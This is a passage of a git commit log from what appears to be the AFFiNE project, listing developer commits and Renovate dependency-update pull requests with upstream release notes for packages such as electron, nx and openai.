2024-09-05 14:20:40 +00:00
JimmFly
10fe79a9a8
chore: remove deprecated admin panel ( #8120 )
2024-09-05 14:07:34 +00:00
akumatus
4bbb94c32d
feat(core): bump blocksuite ( #8114 )
2024-09-05 13:54:56 +00:00
JimmFly
5083fe3cfd
feat(core): update i18n resources ( #8119 )
2024-09-05 12:37:06 +00:00
fundon
de1a51bf7c
fix(core): should open a new tab with parameters ( #8118 )
...
Closes [AF-1343](https://linear.app/affine-design/issue/AF-1343/点击-center-peek-右侧的按钮时,应该携带参数 )
2024-09-05 10:30:39 +00:00
pengx17
7621758c76
fix(electron): tune offline mode filter ( #8113 )
2024-09-05 10:08:56 +00:00
pengx17
f7816a5b28
chore(electron): downgrade electron to v31 ( #8111 )
2024-09-05 09:49:35 +00:00
JimmFly
5c67f98e90
fix(admin): nav bar incorrectly active state ( #7870 )
2024-09-05 09:35:22 +00:00
pengx17
d5ecf503c2
fix(mobile): journal button should not show for edgeless ( #8110 )
2024-09-05 09:16:26 +00:00
pengx17
2a2a969394
feat(mobile): add share button ( #8109 )
2024-09-05 09:16:25 +00:00
EYHN
691bfed185
feat(core): selector for editorSetting hooks ( #8108 )
2024-09-05 08:44:11 +00:00
JimmFly
3837c84791
feat(core): temporarily add page mode editor settings to appearance settings ( #8090 )
...
Will remove it when editor settings is released.

2024-09-05 08:30:01 +00:00
fundon
059030fbeb
fix(core): link generation for selected blocks ( #8087 )
...
Closes [BS-1321](https://linear.app/affine-design/issue/BS-1321/copy-link-to-selected-block )
https://github.com/user-attachments/assets/6102fc7f-9551-4dd4-83b1-758dd0a946f0
2024-09-05 07:47:40 +00:00
akumatus
19a7d1eb92
feat(core): observe editor settings change and update edgeless editor ( #8105 )
...
<div class='graphite__hidden'>
<div>🎥 Video uploaded on Graphite:</div>
<a href="https://app.graphite.dev/media/video/sJGviKxfE3Ap685cl5bj/cfdd0578-274c-42e3-9ef5-5528e8b25306.mov ">
<img src="https://app.graphite.dev/api/v1/graphite/video/thumbnail/sJGviKxfE3Ap685cl5bj/cfdd0578-274c-42e3-9ef5-5528e8b25306.mov ">
</a>
</div>
<video src="https://graphite-user-uploaded-assets-prod.s3.amazonaws.com/sJGviKxfE3Ap685cl5bj/cfdd0578-274c-42e3-9ef5-5528e8b25306.mov ">录屏2024-09-05 14.32.41.mov</video>
2024-09-05 07:30:20 +00:00
JimmFly
f452414952
fix(core): hide the footer that blocks the toolbar in shared page ( #8091 )
...
close PD-1405 CLOUD-64
https://github.com/user-attachments/assets/f6ed2dfc-d238-41d8-abaf-684193a080ff
2024-09-05 07:14:23 +00:00
CatsJuice
03c2051926
feat(component): startScopedViewTranstion func to support scoped view transition ( #8093 )
...
AF-1293
2024-09-05 06:45:29 +00:00
CatsJuice
73dd1d3326
fix(mobile): fixed all docs header, remove doc card tags layout strategy ( #8104 )
...
close AF-1326
2024-09-05 06:29:18 +00:00
renovate
24acce2eac
chore: bump up @blocksuite/icons version to v2.1.67 ( #8006 )
...
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [@blocksuite/icons](https://redirect.github.com/toeverything/icons ) | [`2.1.66` -> `2.1.67`](https://renovatebot.com/diffs/npm/@blocksuite%2ficons/2.1.66/2.1.67 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>toeverything/icons (@​blocksuite/icons)</summary>
### [`v2.1.67`](8842286f0a...4bdeb1d0ae )
[Compare Source](8842286f0a...4bdeb1d0ae )
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about these updates again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC41Ni4wIiwidXBkYXRlZEluVmVyIjoiMzguNTkuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-09-05 05:41:33 +00:00
Yifeng Wang
b711b087c5
docs: add electron build troubleshooting ( #8102 )
2024-09-05 13:39:01 +08:00
renovate
23748c83a1
chore: bump up @faker-js/faker version to v9 ( #8097 )
...
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [@faker-js/faker](https://redirect.github.com/faker-js/faker ) | [`^8.4.1` -> `^9.0.0`](https://renovatebot.com/diffs/npm/@faker-js%2ffaker/8.4.1/9.0.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>faker-js/faker (@​faker-js/faker)</summary>
### [`v9.0.0`](https://redirect.github.com/faker-js/faker/blob/HEAD/CHANGELOG.md#900-2024-09-02 )
[Compare Source](https://redirect.github.com/faker-js/faker/compare/v8.4.1...v9.0.0 )
No noteworthy changes to [9.0.0-rc.1](https://redirect.github.com/faker-js/faker/blob/next/CHANGELOG.md#900-rc1-2024-08-19 )
For those upgrading from earlier versions, please refer to our [Migration Guide](https://v9.fakerjs.dev/guide/upgrading.html ) for detailed instructions.
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC41OS4yIiwidXBkYXRlZEluVmVyIjoiMzguNTkuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-09-05 04:43:03 +00:00
renovate
7c3666ad6d
chore: bump up rustc version to v1.80.1 ( #8099 )
...
This PR contains the following updates:
| Package | Update | Change |
|---|---|---|
| [rustc](https://redirect.github.com/rust-lang/rust ) | patch | `1.80.0` -> `1.80.1` |
---
### Release Notes
<details>
<summary>rust-lang/rust (rustc)</summary>
### [`v1.80.1`](https://redirect.github.com/rust-lang/rust/compare/1.80.0...1.80.1 )
[Compare Source](https://redirect.github.com/rust-lang/rust/compare/1.80.0...1.80.1 )
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC41OS4yIiwidXBkYXRlZEluVmVyIjoiMzguNTkuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-09-05 04:19:58 +00:00
renovate
03a071e4cb
chore: bump up all non-major dependencies ( #8077 )
...
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence | Type | Update |
|---|---|---|---|---|---|---|---|
| [@aws-sdk/client-s3](https://redirect.github.com/aws/aws-sdk-js-v3/tree/main/clients/client-s3 ) ([source](https://redirect.github.com/aws/aws-sdk-js-v3/tree/HEAD/clients/client-s3 )) | [`3.637.0` -> `3.645.0`](https://renovatebot.com/diffs/npm/@aws-sdk%2fclient-s3/3.637.0/3.645.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@aws-sdk/client-s3](https://redirect.github.com/aws/aws-sdk-js-v3/tree/main/clients/client-s3 ) ([source](https://redirect.github.com/aws/aws-sdk-js-v3/tree/HEAD/clients/client-s3 )) | [`3.637.0` -> `3.645.0`](https://renovatebot.com/diffs/npm/@aws-sdk%2fclient-s3/3.637.0/3.645.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@nx/vite](https://nx.dev ) ([source](https://redirect.github.com/nrwl/nx/tree/HEAD/packages/vite )) | [`19.6.4` -> `19.6.5`](https://renovatebot.com/diffs/npm/@nx%2fvite/19.6.4/19.6.5 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@sentry/esbuild-plugin](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/tree/main/packages/esbuild-plugin ) ([source](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins )) | [`2.22.3` -> `2.22.4`](https://renovatebot.com/diffs/npm/@sentry%2fesbuild-plugin/2.22.3/2.22.4 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@sentry/webpack-plugin](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/tree/main/packages/webpack-plugin ) ([source](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins )) | [`2.22.3` -> `2.22.4`](https://renovatebot.com/diffs/npm/@sentry%2fwebpack-plugin/2.22.3/2.22.4 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@toeverything/theme](https://redirect.github.com/toeverything/design ) | [`1.0.7` -> `1.0.8`](https://renovatebot.com/diffs/npm/@toeverything%2ftheme/1.0.7/1.0.8 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [@types/node](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/node ) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/node )) | [`20.16.3` -> `20.16.5`](https://renovatebot.com/diffs/npm/@types%2fnode/20.16.3/20.16.5 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [cssnano](https://redirect.github.com/cssnano/cssnano ) | [`7.0.5` -> `7.0.6`](https://renovatebot.com/diffs/npm/cssnano/7.0.5/7.0.6 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [electron](https://redirect.github.com/electron/electron ) | [`32.0.1` -> `32.0.2`](https://renovatebot.com/diffs/npm/electron/32.0.1/32.0.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [embla-carousel-react](https://www.embla-carousel.com ) ([source](https://redirect.github.com/davidjerleke/embla-carousel )) | [`8.2.0` -> `8.2.1`](https://renovatebot.com/diffs/npm/embla-carousel-react/8.2.0/8.2.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [http-proxy-middleware](https://redirect.github.com/chimurai/http-proxy-middleware ) | [`3.0.1` -> `3.0.2`](https://renovatebot.com/diffs/npm/http-proxy-middleware/3.0.1/3.0.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [marked](https://marked.js.org ) ([source](https://redirect.github.com/markedjs/marked )) | [`14.1.0` -> `14.1.1`](https://renovatebot.com/diffs/npm/marked/14.1.0/14.1.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [msw](https://mswjs.io ) ([source](https://redirect.github.com/mswjs/msw )) | [`2.4.1` -> `2.4.2`](https://renovatebot.com/diffs/npm/msw/2.4.1/2.4.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [nodemailer](https://nodemailer.com/ ) ([source](https://redirect.github.com/nodemailer/nodemailer )) | [`6.9.14` -> `6.9.15`](https://renovatebot.com/diffs/npm/nodemailer/6.9.14/6.9.15 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [nx](https://nx.dev ) ([source](https://redirect.github.com/nrwl/nx/tree/HEAD/packages/nx )) | [`19.6.4` -> `19.6.5`](https://renovatebot.com/diffs/npm/nx/19.6.4/19.6.5 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [openai](https://redirect.github.com/openai/openai-node ) | [`4.57.0` -> `4.57.3`](https://renovatebot.com/diffs/npm/openai/4.57.0/4.57.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [postcss](https://postcss.org/ ) ([source](https://redirect.github.com/postcss/postcss )) | [`8.4.44` -> `8.4.45`](https://renovatebot.com/diffs/npm/postcss/8.4.44/8.4.45 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [serde_json](https://redirect.github.com/serde-rs/json ) | `1.0.127` -> `1.0.128` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | patch |
| [sqlx](https://redirect.github.com/launchbadge/sqlx ) | `0.8.1` -> `0.8.2` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | patch |
| [vaul](https://vaul.emilkowal.ski/ ) ([source](https://redirect.github.com/emilkowalski/vaul )) | [`0.9.1` -> `0.9.2`](https://renovatebot.com/diffs/npm/vaul/0.9.1/0.9.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [vite](https://vitejs.dev ) ([source](https://redirect.github.com/vitejs/vite/tree/HEAD/packages/vite )) | [`5.4.2` -> `5.4.3`](https://renovatebot.com/diffs/npm/vite/5.4.2/5.4.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [webpack-dev-server](https://redirect.github.com/webpack/webpack-dev-server ) | [`5.0.4` -> `5.1.0`](https://renovatebot.com/diffs/npm/webpack-dev-server/5.0.4/5.1.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [wrangler](https://redirect.github.com/cloudflare/workers-sdk ) ([source](https://redirect.github.com/cloudflare/workers-sdk/tree/HEAD/packages/wrangler )) | [`3.73.0` -> `3.74.0`](https://renovatebot.com/diffs/npm/wrangler/3.73.0/3.74.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
---
### Release Notes
<details>
<summary>aws/aws-sdk-js-v3 (@​aws-sdk/client-s3)</summary>
### [`v3.645.0`](https://redirect.github.com/aws/aws-sdk-js-v3/blob/HEAD/clients/client-s3/CHANGELOG.md#36450-2024-09-04 )
[Compare Source](https://redirect.github.com/aws/aws-sdk-js-v3/compare/v3.637.0...v3.645.0 )
**Note:** Version bump only for package [@​aws-sdk/client-s3](https://redirect.github.com/aws-sdk/client-s3 )
</details>
<details>
<summary>nrwl/nx (@​nx/vite)</summary>
### [`v19.6.5`](https://redirect.github.com/nrwl/nx/releases/tag/19.6.5 )
[Compare Source](https://redirect.github.com/nrwl/nx/compare/19.6.4...19.6.5 )
#### 19.6.5 (2024-09-03)
##### 🩹 Fixes
- **core:** handle file change conflicts between sync generators ([#​27695](https://redirect.github.com/nrwl/nx/pull/27695 ))
- **core:** filter branch in preparation for nx import ([#​27652](https://redirect.github.com/nrwl/nx/pull/27652 ))
- **core:** add parallelism to target defaults schema ([#​27710](https://redirect.github.com/nrwl/nx/pull/27710 ))
- **core:** bump plugin pool attempts to work with slow runtimes ([#​27726](https://redirect.github.com/nrwl/nx/pull/27726 ))
- **detox:** fix name with camel case ([#​27602](https://redirect.github.com/nrwl/nx/pull/27602 ))
- **expo:** fix unable to build expo local for yarn 4 ([#​26992](https://redirect.github.com/nrwl/nx/pull/26992 ))
- **expo:** add cacheVersion to metro.config ([#​27646](https://redirect.github.com/nrwl/nx/pull/27646 ))
- **misc:** fix the URL of the [@​naxodev/nx-cloudflare](https://redirect.github.com/naxodev/nx-cloudflare ) plugin ([#​27723](https://redirect.github.com/nrwl/nx/pull/27723 ))
- **nx-dev:** show first tab if none selected ([#​27701](https://redirect.github.com/nrwl/nx/pull/27701 ))
- **react-native:** change hermesCommand to build android ([#​27641](https://redirect.github.com/nrwl/nx/pull/27641 ))
- **release:** release plan command should take filters and touched projects into account ([#​27706](https://redirect.github.com/nrwl/nx/pull/27706 ))
- **release:** version plan changelogs should contain authors and refs ([#​27737](https://redirect.github.com/nrwl/nx/pull/27737 ))
##### ❤️ Thank You
- Austin Fahsl [@​fahslaj](https://redirect.github.com/fahslaj )
- Emily Xiong [@​xiongemi](https://redirect.github.com/xiongemi )
- Isaac Mann [@​isaacplmann](https://redirect.github.com/isaacplmann )
- Jack Hsu [@​jaysoo](https://redirect.github.com/jaysoo )
- James Henry [@​JamesHenry](https://redirect.github.com/JamesHenry )
- Leosvel Pérez Espinosa [@​leosvelperez](https://redirect.github.com/leosvelperez )
- MaxKless [@​MaxKless](https://redirect.github.com/MaxKless )
- Nicolas Beaussart
- Victor Berchet [@​vicb](https://redirect.github.com/vicb )
</details>
<details>
<summary>getsentry/sentry-javascript-bundler-plugins (@​sentry/esbuild-plugin)</summary>
### [`v2.22.4`](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/blob/HEAD/CHANGELOG.md#2224 )
[Compare Source](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/compare/2.22.3...2.22.4 )
- feat(react-component-annotate): Handle function body returning a ternary ([#​598](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/issues/598 ))
- fix: Allow injection plugins to apply to files with query parameters and fragments in their name ([#​597](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/issues/597 ))
Work in this release contributed by [@​Thristhart](https://redirect.github.com/Thristhart ). Thank you for your contribution!
</details>
<details>
<summary>toeverything/design (@​toeverything/theme)</summary>
### [`v1.0.8`](https://redirect.github.com/toeverything/design/compare/1.0.7...1.0.8 )
[Compare Source](https://redirect.github.com/toeverything/design/compare/1.0.7...1.0.8 )
</details>
<details>
<summary>cssnano/cssnano (cssnano)</summary>
### [`v7.0.6`](https://redirect.github.com/cssnano/cssnano/releases/tag/cssnano%407.0.6 ): v7.0.6
[Compare Source](https://redirect.github.com/cssnano/cssnano/compare/cssnano@7.0.5...cssnano@7.0.6 )
#### What's Changed
- Update postcss-calc and selector-parser by [@​ludofischer](https://redirect.github.com/ludofischer ) in [https://github.com/cssnano/cssnano/pull/1663 ](https://redirect.github.com/cssnano/cssnano/pull/1663 )
- fix(postcss-convert-values): convert `0ms` to `0s` by [@​btea](https://redirect.github.com/btea ) in [https://github.com/cssnano/cssnano/pull/1665 ](https://redirect.github.com/cssnano/cssnano/pull/1665 )
**Full Changelog**: https://github.com/cssnano/cssnano/compare/cssnano@7.0.5...cssnano@7.0.6
</details>
<details>
<summary>electron/electron (electron)</summary>
### [`v32.0.2`](https://redirect.github.com/electron/electron/releases/tag/v32.0.2 ): electron v32.0.2
[Compare Source](https://redirect.github.com/electron/electron/compare/v32.0.1...v32.0.2 )
### Release Notes for v32.0.2
#### Fixes
- Fixed `MenuItem.click` handler not setting `focusedWindow` parameter when focused window is a `BaseWindow`. [#​43437](https://redirect.github.com/electron/electron/pull/43437 ) <span style="font-size:small;">(Also in [31](https://redirect.github.com/electron/electron/pull/43439 ), [33](https://redirect.github.com/electron/electron/pull/43438 ))</span>
- Fixed an issue where `BaseWindow.setTouchBar` didn't work as expected. [#​43421](https://redirect.github.com/electron/electron/pull/43421 ) <span style="font-size:small;">(Also in [30](https://redirect.github.com/electron/electron/pull/43419 ), [31](https://redirect.github.com/electron/electron/pull/43420 ), [33](https://redirect.github.com/electron/electron/pull/43422 ))</span>
- Fixed bug where camera permissions affected screen sharing. [#​43544](https://redirect.github.com/electron/electron/pull/43544 )
- Fixed devtools to allow restoring saved dock state on Linux when WCO is enabled. [#​43501](https://redirect.github.com/electron/electron/pull/43501 ) <span style="font-size:small;">(Also in [31](https://redirect.github.com/electron/electron/pull/43500 ), [33](https://redirect.github.com/electron/electron/pull/43499 ))</span>
- Fixed electron app in ozone/wayland not being focused when launched from another app. [#​43548](https://redirect.github.com/electron/electron/pull/43548 ) <span style="font-size:small;">(Also in [31](https://redirect.github.com/electron/electron/pull/43547 ), [33](https://redirect.github.com/electron/electron/pull/43546 ))</span>
#### Other Changes
- Updated Chromium to 128.0.6613.84. [#​43425](https://redirect.github.com/electron/electron/pull/43425 )
#### Documentation
- Documentation changes: [#​43459](https://redirect.github.com/electron/electron/pull/43459 )
</details>
<details>
<summary>davidjerleke/embla-carousel (embla-carousel-react)</summary>
### [`v8.2.1`](https://redirect.github.com/davidjerleke/embla-carousel/compare/v8.2.0...81c506653be467c0878240ac02f25b0626136b89 )
[Compare Source](https://redirect.github.com/davidjerleke/embla-carousel/compare/v8.2.0...v8.2.1 )
</details>
<details>
<summary>chimurai/http-proxy-middleware (http-proxy-middleware)</summary>
### [`v3.0.2`](https://redirect.github.com/chimurai/http-proxy-middleware/blob/HEAD/CHANGELOG.md#v302 )
[Compare Source](https://redirect.github.com/chimurai/http-proxy-middleware/compare/v3.0.1...v3.0.2 )
- refactor(dependency): replace is-plain-obj with is-plain-object ([#​1031](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1031 ))
- chore(package): upgrade to eslint v9 ([#​1032](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1032 ))
- fix(logger-plugin): handle undefined protocol and hostname ([#​1036](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1036 ))
</details>
<details>
<summary>markedjs/marked (marked)</summary>
### [`v14.1.1`](https://redirect.github.com/markedjs/marked/compare/v14.1.0...f3c387fbcf9f9a7738072c29ec5f1ed5a326438c )
[Compare Source](https://redirect.github.com/markedjs/marked/compare/v14.1.0...v14.1.1 )
</details>
<details>
<summary>mswjs/msw (msw)</summary>
### [`v2.4.2`](https://redirect.github.com/mswjs/msw/releases/tag/v2.4.2 )
[Compare Source](https://redirect.github.com/mswjs/msw/compare/v2.4.1...v2.4.2 )
#### v2.4.2 (2024-09-04)
##### Bug Fixes
- **cli:** support windows paths in the `init` command ([#​2260](https://redirect.github.com/mswjs/msw/issues/2260 )) ([`ba285b8`](ba285b887c )) [@​ivanfernandez2646](https://redirect.github.com/ivanfernandez2646 ) [@​kettanaito](https://redirect.github.com/kettanaito )
- use typescript@4.8 as the minimal supported version ([#​2251](https://redirect.github.com/mswjs/msw/issues/2251 )) ([`6b2a7e6`](6b2a7e6be8 )) [@​THETCR](https://redirect.github.com/THETCR ) [@​kettanaito](https://redirect.github.com/kettanaito )
- keep `graphql` import as require in cjs ([#​2258](https://redirect.github.com/mswjs/msw/issues/2258 )) ([`b977602`](b97760270b )) [@​kettanaito](https://redirect.github.com/kettanaito )
</details>
<details>
<summary>nodemailer/nodemailer (nodemailer)</summary>
### [`v6.9.15`](https://redirect.github.com/nodemailer/nodemailer/blob/HEAD/CHANGELOG.md#6915-2024-08-08 )
[Compare Source](https://redirect.github.com/nodemailer/nodemailer/compare/v6.9.14...v6.9.15 )
##### Bug Fixes
- Fix memory leak ([#​1667](https://redirect.github.com/nodemailer/nodemailer/issues/1667 )) ([baa28f6](baa28f6596 ))
- **mime:** Added GeoJSON closes [#​1637](https://redirect.github.com/nodemailer/nodemailer/issues/1637 ) ([#​1665](https://redirect.github.com/nodemailer/nodemailer/issues/1665 )) ([79b8293](79b8293ad5 ))
</details>
<details>
<summary>openai/openai-node (openai)</summary>
### [`v4.57.3`](https://redirect.github.com/openai/openai-node/blob/HEAD/CHANGELOG.md#4573-2024-09-04 )
[Compare Source](https://redirect.github.com/openai/openai-node/compare/v4.57.2...v4.57.3 )
Full Changelog: [v4.57.2...v4.57.3](https://redirect.github.com/openai/openai-node/compare/v4.57.2...v4.57.3 )
##### Bug Fixes
- **helpers/zod:** avoid import issue in certain environments ([#​1039](https://redirect.github.com/openai/openai-node/issues/1039 )) ([e238daa](e238daa7c1 ))
##### Chores
- **internal:** minor bump qs version ([#​1037](https://redirect.github.com/openai/openai-node/issues/1037 )) ([8ec218e](8ec218e9ef ))
### [`v4.57.2`](https://redirect.github.com/openai/openai-node/blob/HEAD/CHANGELOG.md#4572-2024-09-04 )
[Compare Source](https://redirect.github.com/openai/openai-node/compare/v4.57.1...v4.57.2 )
Full Changelog: [v4.57.1...v4.57.2](https://redirect.github.com/openai/openai-node/compare/v4.57.1...v4.57.2 )
##### Chores
- **internal:** dependency updates ([#​1035](https://redirect.github.com/openai/openai-node/issues/1035 )) ([e815fb6](e815fb6dee ))
### [`v4.57.1`](https://redirect.github.com/openai/openai-node/blob/HEAD/CHANGELOG.md#4571-2024-09-03 )
[Compare Source](https://redirect.github.com/openai/openai-node/compare/v4.57.0...v4.57.1 )
Full Changelog: [v4.57.0...v4.57.1](https://redirect.github.com/openai/openai-node/compare/v4.57.0...v4.57.1 )
##### Bug Fixes
- **assistants:** correctly accumulate tool calls when streaming ([#​1031](https://redirect.github.com/openai/openai-node/issues/1031 )) ([d935ad3](d935ad3fa3 ))
- **client:** correct File construction from node-fetch Responses ([#​1029](https://redirect.github.com/openai/openai-node/issues/1029 )) ([22ebdc2](22ebdc2ca7 ))
- runTools without stream should not emit user message events ([#​1005](https://redirect.github.com/openai/openai-node/issues/1005 )) ([22ded4d](22ded4d549 ))
##### Chores
- **internal/tests:** workaround bug in recent types/node release ([3c7bdfd](3c7bdfdb37 ))
</details>
<details>
<summary>postcss/postcss (postcss)</summary>
### [`v8.4.45`](https://redirect.github.com/postcss/postcss/blob/HEAD/CHANGELOG.md#8445 )
[Compare Source](https://redirect.github.com/postcss/postcss/compare/8.4.44...8.4.45 )
- Removed unnecessary fix which could lead to infinite loop.
</details>
<details>
<summary>serde-rs/json (serde_json)</summary>
### [`v1.0.128`](https://redirect.github.com/serde-rs/json/releases/tag/1.0.128 )
